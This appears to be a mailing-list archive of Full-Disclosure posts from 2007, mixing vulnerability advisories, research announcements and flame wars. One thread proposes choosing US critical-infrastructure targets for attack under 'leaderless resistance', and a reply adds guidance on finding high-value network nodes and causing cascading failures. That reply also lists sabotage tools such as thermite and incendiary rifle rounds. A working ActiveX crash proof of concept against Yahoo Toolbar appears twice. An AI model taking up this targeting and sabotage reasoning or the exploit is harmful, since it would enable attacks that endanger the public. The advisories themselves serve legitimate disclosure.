Re: [Full-disclosure] High Value Target Selection
On Friday 30 November 2007 09:02:26 gmaggro wrote: I think it'd be interesting if we started a discussion on the selection of high value targets to be used in the staging of attacks that damage significant infrastructure. The end goals, ranked equal in importance, would be as follows: [big snip] So, you wanted to send a little Christmas present to the NSA folks monitoring the Internet backbone? Make their unutterably boring lives a little more interesting? We live in interesting times (not a good thing). I was over at the Mycroft site, and noticed that there was a Firefox search extension for Scroogle that uses encryption. There was another encrypted search tool for Wikipedia. http://mycroft.mozdev.org/download.html?name=scrooglesherlock=yesopensearch=yessubmitform=Search http://mycroft.mozdev.org/download.html?name=secure+wikipediasherlock=yesopensearch=yessubmitform=Search -- Hawaiian Astronomical Society: http://www.hawastsoc.org HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 27Mhz based wireless security insecurities - Aka - We know what you typed last summer
Dear List members, Today the team remote-exploit.org together with Dreamlab Technologies likes to release another piece of uniq research work. Although the trend in wireless communication in peripheral devices such as keyboards and mice is moving towards Bluetooth, market leaders such as Logitech and Microsoft rely on cost-efficient, tried-and-tested 27Mhz radio technology. Using just a simple radio receiver, a soundcard and suitable software, the remote-exploit.org members Max Moser Philipp Schroedel have managed to tap and decode the radio frequencies transmitted between the keyboard and PC/notebook computer. Although manufacturers of wireless keyboards partially prevent data from being tapped by using cryptography, unfortunately the encryption is weak and thus does not offer real protection. During the test, we succeeded in eavesdropping traffic from a distance of up to ten meters. With the appropriate technical equipment, larger distances are possible. For further information/whitepaper and a demonstration of the attack checkout: http://www.remote-exploit.org or http://www.dreamlab.net. In addition you can find the official non-technical press release from Dreamlab Technologies at: http://www.remote-exploit.org/Press_Release_Dreamlab_Technologies_Wireless_Keyboard.pdf Max Moser Philipp Schroedel Dreamlab Technologies AG / Team remote-exploit.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] High Value Target Selection
I think it'd be interesting if we started a discussion on the selection of high value targets to be used in the staging of attacks that damage significant infrastructure. The end goals, ranked equal in importance, would be as follows: 1. To bring like minded people together while operating under the strategy of 'leaderless resistance' (http://en.wikipedia.org/wiki/Leaderless_resistance) 2. To be the 'aboveground' partner to the 'underground' scene, or at least serve to distract authorities from the activities of underground groups 3. To see exactly what can be accomplished, and accomplish it 4. To capture the imagination of the public The 'leaderless resistance' aspect of organization is going to be key. Plenty of technology exists for encryption and anonymity but that doesn't apply to people. We have to be like the Internet itself here, as originally intended: able to take the largest of blows and route around the damage automatically. We also have to be like good encryption: able to expose everything about our mechanism without leading to compromise. Capturing the imagination of the public sounds like bizspeek bullshit, but it's a very powerful tool - it only takes one cow to start a stampede. Furthermore it serves as a useful discriminator in selecting targets. Bringing down Facebook or Amazon might annoy people... but it really gets driven home when they can't pay their bills, buy food from supermarkets, or take the train to work. So, types of infrastructure to attack: 1. Transportation 2. Financial 3. Telecommunications 4. Petrochemical 5. Manufacturing 6. Health care 7. Education 8. Civilian Law Enforcement 9. Government (Judicial, Executive, Legislative) 10. Military This is just what I've thought of to date. One thing we'll need to do is prioritize that list and flesh it out. For instance, for 'Financial' I'd be inclined to break up something like this: banks, credit card companies, credit processing companies, ATM companies, credit bureaus, collection agencies, investment firms, etc. I guess we should pick some kind of a nation-state to narrow the scope. I'm going to propose the USA for several reasons: 1. Alot of folks got it in for them. This makes it easier to blend into the background. There's also the potential for assistance via enemy-of-my-enemy-is-my-friend co-operation among like minded individuals and groups. Also, in security, the advantage always goes to the attacker; he only needs to be successful once but the defender has to suceed every time. And since they're no doubt getting assaulted left right and centre they've probably been tenderized pretty good. These factors, I believe, combine to nullify any advantage they might have from being well practiced at having to withstand assaults. 2.They're weak right now. In many ways. Given the issues in the sub-prime market and it's cascade effects, profits are down everywhere. When businesses lose money, what's the first thing that suffers? Customer service. What's the second thing? Security. Not trying to slant politically one way or the other here, but the American implementation of capitalism is not renowned for having led to people making quality goods or loving their jobs. Sloppiness abounds whether it's ACLs on the router or easy-to-social-engineer employees. The effects of more people losing their jobs and increased sociocultural turmoil will only exacerbate this. Alot of talented people will be out a job for reason of economics or colour, and if engaged properly, can add to the ranks. 3. They're easy to penetrate. If you can't walk right into the states over the Mexican or Canadian border, then there's a million lines of fibre and copper running straight in. It is an incredibly well connected place with a widely geographically dispersed populace. And alot of coffee shops near open wifi. Entire cities blanketed in connectivity accessible from back alleys, washrooms in malls, or remote corners of public parks with a 12db Yagi. Miles upon miles of SCADA wiring. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] High Value Target Selection
On Nov 30, 2007 11:02 AM, gmaggro [EMAIL PROTECTED] wrote: I think it'd be interesting if we started a discussion on the selection of high value targets translation: let's discuss how to discern high degree and/or vulnerable nodes in critical infrastructure networks. 1. To bring like minded people together while operating under the strategy of 'leaderless resistance' (http://en.wikipedia.org/wiki/Leaderless_resistance) *yawn* 2. To be the 'aboveground' partner to the 'underground' scene, or at least serve to distract authorities from the activities of underground groups ... ZZZZZ ... you're losing me, jim. 3. To see exactly what can be accomplished, and accomplish it pretty easy to make inferences once you've mapped out the critical infrastructure in question. this is of course a little more difficult now given the mostly inept attempts to reign in useful information on such infrastructure. (the easy days of pulling up fiber plats via county/gov websites is long gone...) as for actual attacks, you'll be biting the hand that feeds... (i'll wait for that decentralized wireless mesh net before slicing those glassy life lines, thanks) 4. To capture the imagination of the public more like hatred. the unwashed masses get all restless and cranky when: a) the 'tubes are clogged or dead b) phone lines to anywhere outside town are down. c) all credit / debit transactions are dead - cash only? d) some/most cable programming is tits up e) travel and/or fuel is highly constrained / unavailable f) electricity is spotty or unavailable Capturing the imagination of the public sounds like bizspeek bullshit, this i fully agree with. thanks for that... So, types of infrastructure to attack: [ list of infrastructure domains as if they exist as discrete units independent of each other... lolz! ] rarely is one affected in isolation. the ugly truth about critical infrastructure is that those high degree, critical nodes start impacting multiple domains at once when affected by outages or targeted attack. [lots of blah blah blah misunderstanding of what critical infrastructure is and how it is organized, USA bashing, etc...] first, go read Global Guerrillas. that will keep you busy for a few weeks and save us all more of this blather: http://globalguerrillas.typepad.com/globalguerrillas/ second, some attacking critical infrastructure clif notes: 1. those with clue have realized the folly of trying to make infallible infrastructure. their focus has shifted to rapid repair instead of prevention. there are papers written that describe exactly how stupid it is to think you can build resilient infrastructure in the face of a skilled attacker. (see the ATT telco in a trailer truck, etc) 2. critical infrastructure viewed as a graph theory problem highlights the compound vulnerabilities across multiple infrastructures inherent in high degree / high value nodes of critical infrastucture. (metropolitan bridges carrying fiber, gas, electricity, vehicles, etc over the same physical span, etc.) 3. most critical infrastructure is resilient against planned / common failure scenarios, and these protections actually create hyper- sensitive vulnerabilities against targeted / unplanned attacks. (M of N redundancy that leads to catastrophic failure against well targeted M attacks, etc.) combining these aspects into attack scenarios is left as an exercise for the reader [who pines for a vacation in club fed...] the crux of the problem for the practical attacker is discerning the nature and location of critical infrastructure nodes and links. fortunately for the determined individual this is merely a matter of effort and time, not a question of ability. for the rest of us this means our life style / way of life is highly dependent on the lack of sufficiently skilled malcontents able and willing to express their grievances in direct action against such systems. perhaps this can be viewed as a check against the fascist dystopia many fear as the end result of authoritarian abuse of power coupled with high tech tools for manipulation and control of the populace... best regards, p.s. my favorite tools in such scenarios (of course not advocation): - the thermic lance - portable saws (lithium battery cells quite power dense now) - post hole diggers - thermite flower pots (lol, so much fun!) - software defined / police band and EM svcs capable radios - bolt action .50 BMG (incendiary DU rounds++) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo Toolbar Helper c() Method Stack Overflow DoS
Yeah, strange how EIP isn't overwritten with your hacker savvy 0x41
characters. Except for the fact that this again is a stack overflow
exception and not a stack based buffer overflow. I implore you,
LEAVE THE TROLLING TO THE PROFESSIONALS. Thanks.
J
On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad
[EMAIL PROTECTED] wrote:
There is a stack overflow in the c() method of the Yahoo Toobar
Helper class. This overflow does not appear to get anywhere near
the EIP or SEH. PoC as follows:
--
!--
written by e.b.
--
html
head
script language=JavaScript DEFER
function Check() {
var s = ;
while (s.length 99) s=s+s;
var obj = new ActiveXObject(yt.ythelper.2); //{02478D38-
C3F9-4EFB-9B51-7695ECA05670}
obj.c(s);
}
/script
/head
body onload=JavaScript: return Check();
/body
/html
--
Elazar
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Click here for to find products that will help grow your small business.
http://tagline.hushmail.com/fc/Ioyw6h4eDJdaRPJuJyztiEAJ83hvsi2qyqoJMOdLAcA5KZpqWleU5a/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v denounces the actions of www.derangedsecurity.com
Byron, I don't understand what you mean in this message. Can you elaborate? J On Thu, 29 Nov 2007 10:05:19 -0500 Byron Sonne [EMAIL PROTECTED] wrote: fellow scots stick up for each other, so remember that the next time you talk to a scotsman, because we're tough and bold and we'll kick you in the teeth you swedish fuck. You know why Scots wear kilts, right? Sheep can hear zippers. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AST-2007-026 - SQL Injection issue in cdr_pgsql
Asterisk Project Security Advisory - AST-2007-026 ++ | Product| Asterisk| |--+-| | Summary| SQL Injection issue in cdr_pgsql| |--+-| | Nature of Advisory | SQL Injection | |--+-| |Susceptibility| Remote Authenticated Sessions | |--+-| | Severity | Moderate| |--+-| |Exploits Known| No | |--+-| | Reported On | November 29, 2007 | |--+-| | Reported By | Tilghman Lesher tlesher AT digium DOT com | |--+-| | Posted On | November 29, 2007 | |--+-| | Last Updated On| November 29, 2007 | |--+-| | Advisory Contact | Tilghman Lesher tlesher AT digium DOT com | |--+-| | CVE Name | | ++ ++ | Description | Input buffers were not properly escaped when providing | | | the ANI and DNIS strings to the Call Detail Record | | | Postgres logging engine. An attacker could potentially | | | compromise the administrative database containing users' | | | usernames and passwords used for SIP authentication, | | | among other things. | | | | | | This module is not active by default and must be | | | configured for use by the administrator. Default | | | installations of Asterisk are not affected. | ++ ++ | Workaround | Convert your installation to use cdr_odbc with the| || PgsqlODBC driver. This module provides similar| || functionality but is not vulnerable. | ++ ++ |Resolution| Upgrade to Asterisk release 1.4.15 or higher. | ++ ++ | Affected Versions| || | Product | Release| | | |Series| | |--+--+--| | Asterisk Open Source |1.0.x | All versions | |--+--+--| | Asterisk Open Source |1.2.x | 1.2.24 and previous | |--+--+--| | Asterisk Open Source |1.4.x | 1.4.14 and previous | |--+--+--| |Asterisk Business Edition |A.x.x | All versions | |--+--+--| |Asterisk Business Edition |B.x.x | B.2.3.3 and previous | |--+--+--| | AsteriskNOW| pre-release | None | |--+--+--| | Asterisk
[Full-disclosure] Yahoo Toolbar Helper c() Method Stack Overflow DoS
There is a stack overflow in the c() method of the Yahoo Toobar Helper class.
This overflow does not appear to get anywhere near the EIP or SEH. PoC as
follows:
--
!--
written by e.b.
--
html
head
script language=JavaScript DEFER
function Check() {
var s = ;
while (s.length 99) s=s+s;
var obj = new ActiveXObject(yt.ythelper.2);
//{02478D38-C3F9-4EFB-9B51-7695ECA05670}
obj.c(s);
}
/script
/head
body onload=JavaScript: return Check();
/body
/html
--
Elazar
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PlayStation 3 predicts next US president (fwd)
-- Forwarded message -- Date: Fri, 30 Nov 2007 05:29:35 +0100 From: Weger, B.M.M. de [EMAIL PROTECTED] Cc: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: PlayStation 3 predicts next US president Hi all, We (Marc Stevens, Arjen Lenstra and me) have used a Sony PlayStation 3 to correctly predict the outcome of the 2008 US presidential elections. See http://www.win.tue.nl/hashclash/Nostradamus if you want to know the details of what this has to do with cryptography. We also announce two different Win32 executables that have identical MD5 hash values. This can be made to happen for any two executable files. This implies a vulnerability in software integrity protection and code signing schemes that still use MD5. See http://www.win.tue.nl/hashclash/SoftIntCodeSign for details. Grtz, Benne de Weger - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AST-2007-025 - SQL Injection issue in res_config_pgsql
Asterisk Project Security Advisory - AST-2007-025 ++ | Product| Asterisk| |--+-| | Summary| SQL Injection issue in res_config_pgsql | |--+-| | Nature of Advisory | SQL Injection | |--+-| |Susceptibility| Remote Unauthenticated Sessions | |--+-| | Severity | Moderate| |--+-| |Exploits Known| No | |--+-| | Reported On | November 29, 2007 | |--+-| | Reported By | P. Chisteas p_christ AT hol DOT gr| |--+-| | Posted On | November 29, 2007 | |--+-| | Last Updated On| November 29, 2007 | |--+-| | Advisory Contact | Tilghman Lesher tlesher AT digium DOT com | |--+-| | CVE Name | | ++ ++ | Description | Input buffers were not properly escaped when providing | | | lookup data to the Postgres Realtime Engine. An attacker | | | could potentially compromise the administrative database | | | containing users' usernames and passwords used for SIP | | | authentication, among other things. | | | | | | This module is not active by default and must be | | | configured for use by the administrator. Default | | | installations of Asterisk are not affected. | ++ ++ | Workaround | Convert your installation to use res_config_odbc with the | || PgsqlODBC driver. This module provides similar| || functionality but is not vulnerable. | ++ ++ |Resolution| Upgrade to Asterisk release 1.4.15 or higher. | ++ ++ | Affected Versions| || | Product| Release | | | | Series| | |--+-+---| | Asterisk Open Source |1.0.x| None | |--+-+---| | Asterisk Open Source |1.2.x| None | |--+-+---| | Asterisk Open Source |1.4.x| 1.4.14 and previous | | | | versions | |--+-+---| | Asterisk Business Edition |A.x.x| None | |--+-+---| | Asterisk Business Edition |B.x.x| None | |--+-+---| | AsteriskNOW | pre-release | None | |--+-+---| | Asterisk
[Full-disclosure] Matasano watchdog blog opening shortly ..
Hello .. lol Following our last post about Matasanos retarded commentary on the security scene .. We like all our fans to know that our blog is about to go live. For those who missed our earlier email .. This blog cover the following 1) Every time Matasano/Dave decide to talk from his/there ass, we shoot him down 2) Every time a senseless topic unrelated to security such as turbo bits is discussed we shoot him down 3) Whenever they discuss on virtualized rootkit and herbal pills by Joana Rustokava we REALLY SHOOT THEM DOWN 4) Any name throwing we slap them a bit Tip for matasano - Keep your blog clean, dont act Jesus, don't abuse securityfous nexus power to dictate scene.. and always remember .. He make you look like Jobe from ADM if u act funny .. Having said that, lets start the fireworks .. we are still waiting for one of these jokers to post some new stuff .. once they do .. he post official blog link on FD. Love, Gobble PS – [EMAIL PROTECTED], spam the idiot !! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2007-0254-1 idle python
rPath Security Advisory: 2007-0254-1 Published: 2007-11-30 Products: rPath Appliance Platform Linux Service 1 rPath Linux 1 Rating: Major Exposure Level Classification: Indirect Deterministic Denial of Service Updated Versions: [EMAIL PROTECTED]:1/2.4.1-20.14-1 [EMAIL PROTECTED]:1/2.4.1-20.14-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1885 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4965 Description: Previous versions of the python package contain multiple integer overflow vulnerabilities that can cause some python applications to crash (Denials of Service) or reveal memory contents (Information Exposures). http://wiki.rpath.com/Advisories:rPSA-2007-0254 Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
